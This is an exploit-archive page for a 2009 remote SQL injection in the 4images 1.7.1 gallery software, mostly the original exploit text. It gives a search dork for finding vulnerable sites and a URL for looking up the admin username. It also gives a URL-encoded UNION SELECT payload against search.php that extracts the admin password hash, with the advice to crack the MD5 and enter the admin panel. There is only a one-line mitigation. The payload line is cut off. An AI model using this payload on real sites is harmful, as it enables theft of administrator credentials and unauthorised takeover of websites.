header-logo
Suggest Exploit
vendor:
4images
by:
Master Mind
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: 4images
Affected Version From: 1.7.2001
Affected Version To: 1.7.2001
Patch Exists: NO
Related CWE: N/A
CPE: 4images-1.7.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

4images 1.7.1 Remote SQL Injection Vulnerability

4images 1.7.1 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by searching for the admin username and then using a union select statement to find the admin password. The MD5 hash of the password can then be cracked to gain access to the admin panel.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: 4images 1.7.1 Remote SQL Injection Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Version: 1.7.1
# CVE : [N/A]

=============================================================

~ Script Name : 4images 1.7.1
~ Language : php
~ Author : Master Mind
~ Home : www.shdowskill.com , www.vbspiders.com
=============================================================

Dork : Powered By: 4images 1.7.1

./Exploit:

first search for the admin username :
ex : http://[Target.com]/path/member.php?action=showprofile&user_id=1

now we have the admin username

now we will find the password :]
ex : http://[Target.com]/path/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%2$

admin = admin username

Crack the MD5 Hash and Enjoy :)
admin panel path : http://[Target.com]/path/admin

-----------------------------------------------------------------------------------------------------------------------------$

Greets : The Electronic Bomb , Twi[L]ighT , R3D EYE, Doom[PS] , Mr.BoOoO , AND  ALL MEMBERS.